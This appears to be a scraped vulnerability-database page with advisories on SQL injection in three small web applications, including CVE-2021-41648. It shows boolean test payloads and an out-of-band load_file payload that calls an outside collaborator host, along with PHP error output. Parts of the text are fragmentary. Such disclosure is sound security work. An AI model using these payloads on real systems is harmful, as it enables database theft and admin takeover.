Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>: SQLite3::query(): Unable to prepare statement: 1, unrecognized token: &quot;5a72f9fa6edacd9d71b9e2dc9d1a9ecc&quot; in <b>C:\xampp\htdocs\cashiering\Actions.php</b> on line <b>1
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to a member function fetchArray() on bool in C:\xampp\htdocs\cashiering\Actions.php:15
Stack trace:
#0 C:\xampp\htdocs\cashiering\Actions.php(233): Actions-&gt;login()
#1 {main}
thrown in <b>

Reproduce:

href

Proof and explot:

href

BR nu11secur1ty

1
Ratings
Technical Analysis

CTMS

Vendor

Description:

The parameters username and contactno from COVID 19 Testing Management System (CTMS) 1.0 are vulnerable to Remote Code SQL injection attacks.
Test REQUESTS: Payloads 27325265’ or 8079=8079— and 35638130’ or 9157=9162—.
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The attacker can execute a Remote Code Injection to override the current password for the admin account directly from the broadcast networks!
Status Critical and awful.
BR nu11secur1ty

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-41648

Vendor

Software

Description:

The p parameter of the PuneethReddyHC online-shopping-system-advanced 1.0 appears to be vulnerable to SQL injection attacks.
The payload (select load_file ('\\\\grb7dmacp8fse7awai6uedfhi8o2cz0q2et1jp8.nu11secur1tycollaborator.net\\mpv')) was submitted in the p parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The malicious user can attack the database using four SQL injection methods (UNION query, time-based blind, error-based and boolean-based blind),
then he can dump all information from this database of the app, then he can log in to the admin account, and can do malicious stuff.
Conclusion: Status Critical.

Reproduce:

href

Proof and Exploit:

href

Action: